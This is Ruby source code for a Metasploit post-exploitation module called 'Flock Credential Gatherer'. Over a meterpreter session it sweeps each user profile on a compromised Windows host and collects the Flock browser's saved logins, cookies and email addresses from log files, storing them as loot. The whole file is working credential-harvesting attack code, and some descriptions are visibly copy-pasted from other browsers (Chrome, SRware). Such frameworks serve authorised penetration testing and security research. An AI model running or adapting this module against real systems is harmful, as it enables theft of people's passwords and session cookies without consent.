1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::File
8
  include Msf::Post::Windows::UserProfiles
9
  include Msf::Post::Windows::Packrat
10
  ARTIFACTS =
11
    {
12
      application: 'flock',
13
      app_category: 'browsers',
14
      gatherable_artifacts: [
15
        {
16
          filetypes: 'logins',
17
          path: 'AppData',
18
          dir: 'Flock',
19
          artifact_file_name: 'formhistory.sqlite',
20
          description: "Flock's saved Username and Passwords ",
21
          credential_type: 'sqlite',
22
          sql_search: [
23
            {
24
              sql_description: "Database Commands which exports Chrome's Login data",
25
              sql_table: 'logins',
26
              sql_column: 'username_value, action_url'
27
            }
28
          ]
29
        },
30
        {
31
          filetypes: 'Cookies',
32
          path: 'AppData',
33
          dir: 'Flock',
34
          artifact_file_name: 'cookies.sqlite',
35
          description: "Flock's cookies file",
36
          credential_type: 'sqlite',
37
          sql_search: [
38
            {
39
              sql_description: "Database Commands which exports SRware's Login data",
40
              sql_table: 'cookies',
41
              sql_column: 'host_key, name, path'
42
            }
43
          ]
44
        },
45
        {
46
          filetypes: 'email',
47
          path: 'AppData',
48
          dir: 'Flock',
49
          artifact_file_name: '*.log',
50
          description: 'Log email',
51
          credential_type: 'text',
52
          regex_search: [
53
            {
54
              extraction_description: 'searches for Email addresses within the log files',
55
              extraction_type: 'Email addresses',
56
              regex: [
57
                '(?i-mx:email.*")'
58
              ]
59
            }
60
          ]
61
        }
62
      ]
63
    }.freeze
64

65
  def initialize(info = {})
66
    super(
67
      update_info(
68
        info,
69
        'Name' => 'Flock Credential Gatherer',
70
        'Description' => %q{
71
          This module searches for credentials stored in Flock on a Windows host.
72
        },
73
        'License' => MSF_LICENSE,
74
        'Author' => [
75
          'Kazuyoshi Maruta',
76
          'Daniel Hallsworth',
77
          'Barwar Salim M',
78
          'Z. Cliffe Schreuders' # http://z.cliffe.schreuders.org
79
        ],
80
        'Platform' => ['win'],
81
        'SessionTypes' => ['meterpreter'],
82
        'Notes' => {
83
          'Stability' => [CRASH_SAFE],
84
          'Reliability' => [],
85
          'SideEffects' => []
86
        }
87
      )
88
    )
89

90
    register_options(
91
      [
92
        OptRegexp.new('REGEX', [false, 'Match a regular expression', '^password']),
93
        OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
94
        OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
95
        # enumerates the options based on the artifacts that are defined below
96
        OptEnum.new('ARTIFACTS', [
97
          false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map do |k|
98
                                                          k[:filetypes]
99
                                                        end.uniq.unshift('All')
100
        ])
101
      ]
102
    )
103
  end
104

105
  def run
106
    print_status('Filtering based on these selections:  ')
107
    print_status("ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")
108
    print_status("STORE_LOOT: #{datastore['STORE_LOOT']}")
109
    print_status("EXTRACT_DATA: #{datastore['EXTRACT_DATA']}\n")
110

111
    # used to grab files for each user on the remote host
112
    grab_user_profiles.each do |userprofile|
113
      run_packrat(userprofile, ARTIFACTS)
114
    end
115

116
    print_status 'PackRat credential sweep completed'
117
  end
118
end
119

120